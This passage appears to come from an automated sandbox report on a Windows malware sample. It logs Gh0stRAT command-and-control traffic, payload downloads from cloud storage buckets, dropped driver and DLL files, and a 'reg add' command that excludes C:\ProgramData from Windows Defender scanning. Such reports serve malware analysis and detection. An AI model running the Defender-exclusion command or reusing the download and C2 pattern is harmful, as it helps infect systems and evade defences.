Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBEA1B8 FindFirstFileExW,2_2_00007FFAADBEA1B8
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]2_2_000000014000DFFE
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]2_2_000000014000DDFF
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]2_2_0000000140011270
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]2_2_000000014000DE96
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]2_2_000000014000DEFB
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]2_2_000000014000E178
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]2_2_000000014000DDD9

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.11.20:49769 -> 8.217.78.242:8917
Source: global trafficTCP traffic: 192.168.11.20:49769 -> 8.217.78.242:8917
Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49753 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49757 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49758 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49755 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49759 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49761 -> 39.103.20.17:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49760 -> 39.103.20.17:443
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: unknownTCP traffic detected without corresponding DNS query: 8.217.78.242
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: DoHost: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /extra-task2.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dsb-hr2.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dsb-hr3.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dsb-hr1.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /page-404.png HTTP/1.1User-Agent: Chrome/114.0.0.0Host: upitem.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: vien3h.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: vqxvll.net
Source: global trafficDNS traffic detected: DNS query: upitem.oss-cn-hangzhou.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000135000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: 183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000135000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 189atohci.sys.0.dr, ieiUC1.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, ieiUC1.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: ieiUC1.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: ieiUC1.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: ieiUC1.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: ieiUC1.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: ieiUC1.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: ieiUC1.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: ieiUC1.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: ieiUC1.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: ieiUC1.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: ieiUC1.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: ieiUC1.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: ieiUC1.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: ieiUC1.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, ieiUC1.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ieiUC1.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, ieiUC1.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, ieiUC1.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: ieiUC1.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000135000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: ieiUC1.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: ieiUC1.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: ieiUC1.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: ieiUC1.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: ieiUC1.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: ieiUC1.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000135000.00000004.00000020.00020000.00000000.sdmp, 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/##vien3h.oss-cn-beijing.aliyuncs.com
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/a.gif
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/a.gifU
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/a.gifhttps://vien3h.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/b.gif
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/c.gif
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/d.gif
Source: 183643586-388657435.07.exe, 00000000.00000003.36115490043.0000000000106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com/i.dat
Source: 183643586-388657435.07.exe, 00000000.00000003.36140989648.0000000000118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vien3h.oss-cn-beijing.aliyuncs.com:443/a.gifw0
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49758 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.11.20:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.11.20:49775 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.ieiUC1.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.2.ieiUC1.exe.29d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
PE file contains section with special chars
Source: tbcore3U.dll.4.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.4.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.4.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.37.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.37.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.37.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess Stats: CPU usage > 6%
Source: C:\ProgramData\dTuXOGtw.exeProcess Stats: CPU usage > 6%
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140006C95 NtAllocateVirtualMemory,2_2_0000000140006C95
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,2_2_0000000140001520
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000C3F02_2_000000014000C3F0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000CC002_2_000000014000CC00
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140001A302_2_0000000140001A30
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000C2A02_2_000000014000C2A0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400022C02_2_00000001400022C0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400110F02_2_00000001400110F0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140010CF02_2_0000000140010CF0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400093002_2_0000000140009300
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000BB702_2_000000014000BB70
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140003F802_2_0000000140003F80
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00000001400103D02_2_00000001400103D0
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBF02482_2_00007FFAADBF0248
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_00007FFAADBEA1B82_2_00007FFAADBEA1B8
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 38_2_000A4AE238_2_000A4AE2
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCode function: 39_2_000F4AE239_2_000F4AE2
Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: 183643586-388657435.07.exe, 00000000.00000000.35686089123.0000000141D7C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBootstrapPackagedGame-Win64-Shipping.exeD vs 183643586-388657435.07.exe
Source: 183643586-388657435.07.exeBinary or memory string: OriginalFilenameBootstrapPackagedGame-Win64-Shipping.exeD vs 183643586-388657435.07.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 2.2.ieiUC1.exe.2930000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.2.ieiUC1.exe.29d0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal100.evad.winEXE@76/21@82/4
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,2_2_0000000140003F80
Source: C:\Users\user\Documents\ieiUC1.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,2_2_0000000140001430
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,2_2_0000000140001520
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,2_2_0000000140001520
Source: C:\Users\user\Documents\ieiUC1.exeFile created: C:\Program Files (x86)\DXESuTJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Users\user\Documents\ieiUC1.exeJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:304:WilStaging_02
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_707748
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2548:120:WilError_03
Source: C:\Users\user\Desktop\183643586-388657435.07.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
